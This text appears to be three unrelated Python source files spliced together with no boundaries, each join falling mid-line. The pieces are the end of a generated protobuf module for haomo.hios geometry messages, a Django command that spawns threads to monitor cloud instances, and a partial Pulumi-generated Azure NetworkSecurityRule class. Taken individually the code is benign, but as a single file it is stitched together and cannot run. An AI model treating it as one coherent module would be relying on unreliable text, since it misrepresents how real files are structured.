full_name='haomo.hios.Vec3d.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Vec3d.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='z', full_name='haomo.hios.Vec3d.z', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=59, serialized_end=99, ) _VEC4D = _descriptor.Descriptor( name='Vec4d', full_name='haomo.hios.Vec4d', filename=None, file=DESCRIPTOR, 
containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', full_name='haomo.hios.Vec4d.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Vec4d.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='z', full_name='haomo.hios.Vec4d.z', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='e', full_name='haomo.hios.Vec4d.e', index=3, number=4, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=101, serialized_end=152, ) _POINT3D = _descriptor.Descriptor( name='Point3D', full_name='haomo.hios.Point3D', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='x', full_name='haomo.hios.Point3D.x', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='y', full_name='haomo.hios.Point3D.y', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='z', full_name='haomo.hios.Point3D.z', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=154, serialized_end=196, ) _QUATERNION = _descriptor.Descriptor( name='Quaternion', full_name='haomo.hios.Quaternion', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='qx', full_name='haomo.hios.Quaternion.qx', index=0, number=1, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='qy', full_name='haomo.hios.Quaternion.qy', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( 
name='qz', full_name='haomo.hios.Quaternion.qz', index=2, number=3, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='qw', full_name='haomo.hios.Quaternion.qw', index=3, number=4, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=198, serialized_end=258, ) _RAWDATA = _descriptor.Descriptor( name='RawData', full_name='haomo.hios.RawData', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='data', full_name='haomo.hios.RawData.data', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b"", message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='length', full_name='haomo.hios.RawData.length', index=1, number=2, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='src', full_name='haomo.hios.RawData.src', index=2, number=3, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=260, serialized_end=312, ) DESCRIPTOR.message_types_by_name['Vec2d'] = _VEC2D DESCRIPTOR.message_types_by_name['Vec3d'] = _VEC3D DESCRIPTOR.message_types_by_name['Vec4d'] = _VEC4D DESCRIPTOR.message_types_by_name['Point3D'] = _POINT3D DESCRIPTOR.message_types_by_name['Quaternion'] = _QUATERNION DESCRIPTOR.message_types_by_name['RawData'] = _RAWDATA _sym_db.RegisterFileDescriptor(DESCRIPTOR) Vec2d = _reflection.GeneratedProtocolMessageType('Vec2d', (_message.Message,), { 'DESCRIPTOR' : _VEC2D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Vec2d) }) _sym_db.RegisterMessage(Vec2d) Vec3d = _reflection.GeneratedProtocolMessageType('Vec3d', (_message.Message,), { 'DESCRIPTOR' : _VEC3D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Vec3d) }) _sym_db.RegisterMessage(Vec3d) Vec4d = _reflection.GeneratedProtocolMessageType('Vec4d', (_message.Message,), { 'DESCRIPTOR' : _VEC4D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Vec4d) }) _sym_db.RegisterMessage(Vec4d) Point3D = _reflection.GeneratedProtocolMessageType('Point3D', (_message.Message,), { 'DESCRIPTOR' : _POINT3D, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Point3D) }) _sym_db.RegisterMessage(Point3D) Quaternion = _reflection.GeneratedProtocolMessageType('Quaternion', (_message.Message,), { 'DESCRIPTOR' : _QUATERNION, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.Quaternion) }) 
_sym_db.RegisterMessage(Quaternion) RawData = _reflection.GeneratedProtocolMessageType('RawData', (_message.Message,), { 'DESCRIPTOR' : _RAWDATA, '__module__' : 'common_pb2' # @@protoc_insertion_point(class_scope:haomo.hios.RawData) }) _sym_db.RegisterMessage(RawData) # @@protoc_insertion_point(module_scope) from threading import Thread import time from django.core.management.base import BaseCommand from clouds.models import Instance class Command(BaseCommand): help = 'monitor cloud resource periodly' def handle(self, *args, **options): while True: for instance in Instance.objects.exclude(uuid=None): Thread(target=instance.monitor).start() time.sleep(0.1) time.sleep(300)# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['NetworkSecurityRuleArgs', 'NetworkSecurityRule'] @pulumi.input_type class NetworkSecurityRuleArgs: def __init__(__self__, *, access: pulumi.Input[str], direction: pulumi.Input[str], network_security_group_name: pulumi.Input[str], priority: pulumi.Input[int], protocol: pulumi.Input[str], resource_group_name: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ The set of arguments for constructing a NetworkSecurityRule resource. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. 
Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. 
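A minimal construction sketch (illustrative values and placeholder names, shown for orientation rather than taken from the provider documentation):

    NetworkSecurityRuleArgs(
        access="Allow",
        direction="Inbound",
        network_security_group_name="example-nsg",
        priority=100,
        protocol="Tcp",
        resource_group_name="example-resources",
        source_port_range="*",
        destination_port_range="443",
        source_address_prefix="*",
        destination_address_prefix="*",
    )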
""" pulumi.set(__self__, "access", access) pulumi.set(__self__, "direction", direction) pulumi.set(__self__, "network_security_group_name", network_security_group_name) pulumi.set(__self__, "priority", priority) pulumi.set(__self__, "protocol", protocol) pulumi.set(__self__, "resource_group_name", resource_group_name) if description is not None: pulumi.set(__self__, "description", description) if destination_address_prefix is not None: pulumi.set(__self__, "destination_address_prefix", destination_address_prefix) if destination_address_prefixes is not None: pulumi.set(__self__, "destination_address_prefixes", destination_address_prefixes) if destination_application_security_group_ids is not None: pulumi.set(__self__, "destination_application_security_group_ids", destination_application_security_group_ids) if destination_port_range is not None: pulumi.set(__self__, "destination_port_range", destination_port_range) if destination_port_ranges is not None: pulumi.set(__self__, "destination_port_ranges", destination_port_ranges) if name is not None: pulumi.set(__self__, "name", name) if source_address_prefix is not None: pulumi.set(__self__, "source_address_prefix", source_address_prefix) if source_address_prefixes is not None: pulumi.set(__self__, "source_address_prefixes", source_address_prefixes) if source_application_security_group_ids is not None: pulumi.set(__self__, "source_application_security_group_ids", source_application_security_group_ids) if source_port_range is not None: pulumi.set(__self__, "source_port_range", source_port_range) if source_port_ranges is not None: pulumi.set(__self__, "source_port_ranges", source_port_ranges) @property @pulumi.getter def access(self) -> pulumi.Input[str]: """ Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. """ return pulumi.get(self, "access") @access.setter def access(self, value: pulumi.Input[str]): pulumi.set(self, "access", value) @property @pulumi.getter def direction(self) -> pulumi.Input[str]: """ The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. """ return pulumi.get(self, "direction") @direction.setter def direction(self, value: pulumi.Input[str]): pulumi.set(self, "direction", value) @property @pulumi.getter(name="networkSecurityGroupName") def network_security_group_name(self) -> pulumi.Input[str]: """ The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. """ return pulumi.get(self, "network_security_group_name") @network_security_group_name.setter def network_security_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "network_security_group_name", value) @property @pulumi.getter def priority(self) -> pulumi.Input[int]: """ Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. """ return pulumi.get(self, "priority") @priority.setter def priority(self, value: pulumi.Input[int]): pulumi.set(self, "priority", value) @property @pulumi.getter def protocol(self) -> pulumi.Input[str]: """ Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). 
""" return pulumi.get(self, "protocol") @protocol.setter def protocol(self, value: pulumi.Input[str]): pulumi.set(self, "protocol", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Input[str]: """ The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: pulumi.Input[str]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ A description for this rule. Restricted to 140 characters. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="destinationAddressPrefix") def destination_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. """ return pulumi.get(self, "destination_address_prefix") @destination_address_prefix.setter def destination_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_address_prefix", value) @property @pulumi.getter(name="destinationAddressPrefixes") def destination_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. """ return pulumi.get(self, "destination_address_prefixes") @destination_address_prefixes.setter def destination_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_address_prefixes", value) @property @pulumi.getter(name="destinationApplicationSecurityGroupIds") def destination_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of destination Application Security Group ID's """ return pulumi.get(self, "destination_application_security_group_ids") @destination_application_security_group_ids.setter def destination_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_application_security_group_ids", value) @property @pulumi.getter(name="destinationPortRange") def destination_port_range(self) -> Optional[pulumi.Input[str]]: """ Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. """ return pulumi.get(self, "destination_port_range") @destination_port_range.setter def destination_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_port_range", value) @property @pulumi.getter(name="destinationPortRanges") def destination_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination ports or port ranges. 
This is required if `destination_port_range` is not specified. """ return pulumi.get(self, "destination_port_ranges") @destination_port_ranges.setter def destination_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_port_ranges", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="sourceAddressPrefix") def source_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. """ return pulumi.get(self, "source_address_prefix") @source_address_prefix.setter def source_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_address_prefix", value) @property @pulumi.getter(name="sourceAddressPrefixes") def source_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. """ return pulumi.get(self, "source_address_prefixes") @source_address_prefixes.setter def source_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_address_prefixes", value) @property @pulumi.getter(name="sourceApplicationSecurityGroupIds") def source_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of source Application Security Group ID's """ return pulumi.get(self, "source_application_security_group_ids") @source_application_security_group_ids.setter def source_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_application_security_group_ids", value) @property @pulumi.getter(name="sourcePortRange") def source_port_range(self) -> Optional[pulumi.Input[str]]: """ Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. """ return pulumi.get(self, "source_port_range") @source_port_range.setter def source_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "source_port_range", value) @property @pulumi.getter(name="sourcePortRanges") def source_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of source ports or port ranges. This is required if `source_port_range` is not specified. 
""" return pulumi.get(self, "source_port_ranges") @source_port_ranges.setter def source_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "source_port_ranges", value) @pulumi.input_type class _NetworkSecurityRuleState: def __init__(__self__, *, access: Optional[pulumi.Input[str]] = None, description: Optional[pulumi.Input[str]] = None, destination_address_prefix: Optional[pulumi.Input[str]] = None, destination_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, destination_application_security_group_ids: Optional[pulumi.Input[str]] = None, destination_port_range: Optional[pulumi.Input[str]] = None, destination_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, direction: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, network_security_group_name: Optional[pulumi.Input[str]] = None, priority: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, source_address_prefix: Optional[pulumi.Input[str]] = None, source_address_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, source_application_security_group_ids: Optional[pulumi.Input[str]] = None, source_port_range: Optional[pulumi.Input[str]] = None, source_port_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None): """ Input properties used for looking up and filtering NetworkSecurityRule resources. :param pulumi.Input[str] access: Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. :param pulumi.Input[str] description: A description for this rule. Restricted to 140 characters. :param pulumi.Input[str] destination_address_prefix: CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_address_prefixes: List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. :param pulumi.Input[str] destination_application_security_group_ids: A List of destination Application Security Group ID's :param pulumi.Input[str] destination_port_range: Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] destination_port_ranges: List of destination ports or port ranges. This is required if `destination_port_range` is not specified. :param pulumi.Input[str] direction: The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. :param pulumi.Input[str] name: The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. 
:param pulumi.Input[str] network_security_group_name: The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. :param pulumi.Input[int] priority: Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. :param pulumi.Input[str] protocol: Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). :param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. :param pulumi.Input[str] source_address_prefix: CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This is required if `source_address_prefixes` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_address_prefixes: List of source address prefixes. Tags may not be used. This is required if `source_address_prefix` is not specified. :param pulumi.Input[str] source_application_security_group_ids: A List of source Application Security Group ID's :param pulumi.Input[str] source_port_range: Source Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `source_port_ranges` is not specified. :param pulumi.Input[Sequence[pulumi.Input[str]]] source_port_ranges: List of source ports or port ranges. This is required if `source_port_range` is not specified. """ if access is not None: pulumi.set(__self__, "access", access) if description is not None: pulumi.set(__self__, "description", description) if destination_address_prefix is not None: pulumi.set(__self__, "destination_address_prefix", destination_address_prefix) if destination_address_prefixes is not None: pulumi.set(__self__, "destination_address_prefixes", destination_address_prefixes) if destination_application_security_group_ids is not None: pulumi.set(__self__, "destination_application_security_group_ids", destination_application_security_group_ids) if destination_port_range is not None: pulumi.set(__self__, "destination_port_range", destination_port_range) if destination_port_ranges is not None: pulumi.set(__self__, "destination_port_ranges", destination_port_ranges) if direction is not None: pulumi.set(__self__, "direction", direction) if name is not None: pulumi.set(__self__, "name", name) if network_security_group_name is not None: pulumi.set(__self__, "network_security_group_name", network_security_group_name) if priority is not None: pulumi.set(__self__, "priority", priority) if protocol is not None: pulumi.set(__self__, "protocol", protocol) if resource_group_name is not None: pulumi.set(__self__, "resource_group_name", resource_group_name) if source_address_prefix is not None: pulumi.set(__self__, "source_address_prefix", source_address_prefix) if source_address_prefixes is not None: pulumi.set(__self__, "source_address_prefixes", source_address_prefixes) if source_application_security_group_ids is not None: pulumi.set(__self__, "source_application_security_group_ids", source_application_security_group_ids) if source_port_range is not None: pulumi.set(__self__, "source_port_range", source_port_range) if source_port_ranges is not None: pulumi.set(__self__, "source_port_ranges", source_port_ranges) @property @pulumi.getter def access(self) -> 
Optional[pulumi.Input[str]]: """ Specifies whether network traffic is allowed or denied. Possible values are `Allow` and `Deny`. """ return pulumi.get(self, "access") @access.setter def access(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "access", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ A description for this rule. Restricted to 140 characters. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="destinationAddressPrefix") def destination_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or destination IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. Besides, it also supports all available Service Tags like ‘Sql.WestEurope‘, ‘Storage.EastUS‘, etc. You can list the available service tags with the cli: ```shell az network list-service-tags --location westcentralus```. For further information please see [Azure CLI - az network list-service-tags](https://docs.microsoft.com/en-us/cli/azure/network?view=azure-cli-latest#az-network-list-service-tags). This is required if `destination_address_prefixes` is not specified. """ return pulumi.get(self, "destination_address_prefix") @destination_address_prefix.setter def destination_address_prefix(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_address_prefix", value) @property @pulumi.getter(name="destinationAddressPrefixes") def destination_address_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination address prefixes. Tags may not be used. This is required if `destination_address_prefix` is not specified. """ return pulumi.get(self, "destination_address_prefixes") @destination_address_prefixes.setter def destination_address_prefixes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_address_prefixes", value) @property @pulumi.getter(name="destinationApplicationSecurityGroupIds") def destination_application_security_group_ids(self) -> Optional[pulumi.Input[str]]: """ A List of destination Application Security Group ID's """ return pulumi.get(self, "destination_application_security_group_ids") @destination_application_security_group_ids.setter def destination_application_security_group_ids(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_application_security_group_ids", value) @property @pulumi.getter(name="destinationPortRange") def destination_port_range(self) -> Optional[pulumi.Input[str]]: """ Destination Port or Range. Integer or range between `0` and `65535` or `*` to match any. This is required if `destination_port_ranges` is not specified. """ return pulumi.get(self, "destination_port_range") @destination_port_range.setter def destination_port_range(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "destination_port_range", value) @property @pulumi.getter(name="destinationPortRanges") def destination_port_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ List of destination ports or port ranges. This is required if `destination_port_range` is not specified. 
""" return pulumi.get(self, "destination_port_ranges") @destination_port_ranges.setter def destination_port_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "destination_port_ranges", value) @property @pulumi.getter def direction(self) -> Optional[pulumi.Input[str]]: """ The direction specifies if rule will be evaluated on incoming or outgoing traffic. Possible values are `Inbound` and `Outbound`. """ return pulumi.get(self, "direction") @direction.setter def direction(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "direction", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the security rule. This needs to be unique across all Rules in the Network Security Group. Changing this forces a new resource to be created. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="networkSecurityGroupName") def network_security_group_name(self) -> Optional[pulumi.Input[str]]: """ The name of the Network Security Group that we want to attach the rule to. Changing this forces a new resource to be created. """ return pulumi.get(self, "network_security_group_name") @network_security_group_name.setter def network_security_group_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "network_security_group_name", value) @property @pulumi.getter def priority(self) -> Optional[pulumi.Input[int]]: """ Specifies the priority of the rule. The value can be between 100 and 4096. The priority number must be unique for each rule in the collection. The lower the priority number, the higher the priority of the rule. """ return pulumi.get(self, "priority") @priority.setter def priority(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "priority", value) @property @pulumi.getter def protocol(self) -> Optional[pulumi.Input[str]]: """ Network protocol this rule applies to. Possible values include `Tcp`, `Udp`, `Icmp`, `Esp`, `Ah` or `*` (which matches all). """ return pulumi.get(self, "protocol") @protocol.setter def protocol(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "protocol", value) @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> Optional[pulumi.Input[str]]: """ The name of the resource group in which to create the Network Security Rule. Changing this forces a new resource to be created. """ return pulumi.get(self, "resource_group_name") @resource_group_name.setter def resource_group_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "resource_group_name", value) @property @pulumi.getter(name="sourceAddressPrefix") def source_address_prefix(self) -> Optional[pulumi.Input[str]]: """ CIDR or source IP range or * to match any IP. Tags such as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used. This 